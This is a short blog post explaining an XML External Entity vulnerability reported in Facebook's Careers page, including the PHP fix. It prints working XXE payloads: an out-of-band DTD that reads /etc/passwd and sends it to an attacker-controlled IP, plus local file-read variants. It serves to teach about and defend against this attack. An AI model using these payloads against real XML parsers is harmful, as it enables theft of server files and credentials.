How I Hacked Facebook with a Word Document

An XML External Entity (XXE) vulnerability was found on the Facebook Careers page by Mohamed Ramadan.

The OWASP XXE Definition reads:

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, port scanning from the perspective of the machine where the parser is located, and other system impacts.

In this case a forged .docx (which is in fact XML) including a custom DTD was uploaded. As that DTD pointed towards a URL under the hacker his control:

1. Uploaded XML:

<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://197.xxx.xxx.90/ext.dtd">
%dtd;
%send;
]]>

2. The ext.dtd file (on a server you control):

<!ENTITY % all
"<!ENTITY % &#x25; send SYSTEM 'http://197.xxx.xxx.90/FACEBOOK-HACKED?%file;'>"
>
%all;

As the contents of ext.dtd are processed on the server which received the payload, a request to http://197.xxx.xxx.90/FACEBOOK-HACKED… along with the contents of the file entity (!!) attached to it will be made by the server.

How I Hacked Facebook with a Word Document →

Note: To fix this in PHP call libxml_disable_entity_loader(true); in your code. If you don’t, XML files like this one can do nasty stuff (yes, that reads in /etc/passwd and shows it onscreen):

<!DOCTYPE test [ <!ENTITY xxeattack SYSTEM "file:///etc/passwd"> ]>
<xxx>&xxeattack;</xxx>

A somewhat altered version is this one, which uses PHP. The result is a single base64-encode string which you can attach as a querystring parameter to a URL:

<!DOCTYPE scan [ <!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]>
<scan>&test;</scan>

Recommended further reading:

Published by Bramus!

Bramus is a frontend web developer from Belgium, working as a Chrome Developer Relations Engineer at Google. From the moment he discovered view-source at the age of 14 (way back in 1997), he fell in love with the web and has been tinkering with it ever since (more …)

Leave a comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.